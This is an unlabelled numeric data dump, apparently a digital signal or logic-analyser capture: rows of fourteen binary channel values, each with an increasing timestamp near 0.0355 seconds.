1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5490212e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5490236e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5490264e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5490288e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5490316e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5490340e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5490364e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5490388e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5490412e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5490436e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5490464e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5490488e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5490516e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5490540e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5490564e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5490588e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5490612e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5490636e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5490664e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5490688e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5490716e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5490740e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5490764e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5490788e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5490812e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5490836e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5490864e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,3.5615308e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,3.5615524e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,3.5615548e-02 0,1,1,1,1,0,0,0,0,0,0,1,0,1,3.5615580e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,3.5615604e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,3.5615884e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,3.5615908e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,3.5615916e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,1,3.5615960e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,3.5615984e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,3.5615992e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,3.5616008e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,3.5616036e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,1,3.5616084e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,3.5616108e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,3.5616116e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,3.5616132e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5616140e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5616156e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5616164e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5616212e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5616236e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5616244e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5616260e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5616284e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5616288e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5616332e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5616356e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5616364e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5616384e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5616408e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5616436e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5616460e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5616484e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5616508e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5616560e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5616584e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5616588e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5616636e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5616660e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5616668e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5616684e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5616708e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5616716e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5616760e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5616780e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,3.5616788e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5616792e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5616808e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5616836e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5616860e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5616884e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5616908e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5616932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5616956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5616980e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5616988e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5617036e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5617056e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5617068e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5617084e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5617108e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5617112e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5617156e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5617180e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5617188e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5617204e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5617236e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5617256e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5617284e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5617308e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5617332e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5617380e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5617404e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5617412e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5617456e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5617484e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,3.5617488e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5617492e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5617508e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5617532e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5617580e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5617604e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5617636e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5617656e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5617684e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5617708e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5617732e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5617756e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5617780e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5617804e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5617812e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5617856e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5617884e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,3.5617888e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5617892e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5617908e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5617932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5617956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5617980e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5617988e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5618036e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5618056e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5618068e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5618084e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5618108e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5618132e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5618156e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5618180e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5618204e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5618236e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5618256e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5618284e-02 0,1,1,1,1,0,0,0,0,1,0,0,0,0,3.5618308e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5618312e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5618356e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5618380e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5618388e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5618436e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5618456e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5618484e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5618508e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5618532e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5618556e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5618580e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5618604e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5618612e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5618660e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5618684e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,3.5618688e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5618692e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5618708e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5618732e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5618736e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5618756e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5618780e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5618804e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5618836e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5618856e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5618884e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5618908e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5618932e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5618980e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5619004e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5619036e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5619056e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619068e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5619084e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619108e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5619132e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619156e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5619164e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5619208e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,3.5619236e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619240e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5619256e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619284e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5619308e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619332e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5619356e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619380e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5619408e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619436e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5619460e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619484e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5619508e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619532e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5619556e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619584e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5619608e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619636e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5619660e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619684e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5619708e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619732e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5619756e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619784e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5619808e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619836e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5619860e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619884e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5619908e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5619956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5619984e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620008e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620036e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620060e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620084e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620108e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620132e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620156e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620184e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620208e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620236e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620260e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620284e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620308e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620332e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620356e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620384e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620408e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620436e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620460e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620484e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620508e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620532e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620556e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620584e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620608e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620636e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620660e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620684e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620708e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620732e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620756e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620784e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620808e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620836e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620860e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620884e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620908e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5620956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5620980e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621008e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621036e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621060e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621084e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621108e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621132e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621156e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621180e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621208e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621236e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621260e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621284e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621308e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621332e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621356e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621380e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621408e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621436e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621460e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621484e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621508e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621532e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621556e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621580e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621608e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621636e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621660e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621684e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621708e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621732e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621756e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621780e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621808e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621836e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621860e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621884e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621908e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5621956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5621980e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5622008e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5622036e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5622060e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5622084e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5622108e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5622132e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5622156e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5622180e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5622208e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5622236e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5622260e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5622284e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5622308e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5622332e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5622356e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5622380e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5622408e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5622436e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5622460e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5622484e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5622508e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5622532e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5622556e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5622580e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5622608e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5622632e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5622656e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5622684e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5622708e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5622732e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,3.5747212e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,3.5747440e-02 1,1,1,1,1,0,0,0,0,0,0,1,0,1,3.5747476e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,3.5747500e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5748108e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5748524e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5748556e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5748560e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5748580e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5748604e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5748612e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5748660e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5748680e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,3.5748684e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5748688e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5748704e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5748732e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,3.5748736e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5748740e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5748780e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5748804e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5748812e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5748828e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5748852e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5748860e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5748880e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5748904e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5748908e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5748932e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5748956e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,3.5748960e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5748964e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5749004e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5749028e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5749080e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5749104e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5749156e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5749180e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5749184e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5749204e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5749228e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5749280e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5749304e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5749312e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5749332e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,3.5749356e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5749360e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5749404e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5749428e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5749436e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5749452e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5749476e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5749500e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5749524e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5749556e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5749576e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5749604e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,3.5749628e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5749632e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5749676e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5749700e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5749708e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5749724e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5749756e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5749776e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5749804e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,3.5749808e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5749812e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5749852e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5749876e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5749928e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5749956e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5750004e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5750028e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5750032e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5750052e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5750076e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5750128e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,3.5750156e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5750160e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5750180e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,3.5750204e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5750208e-02 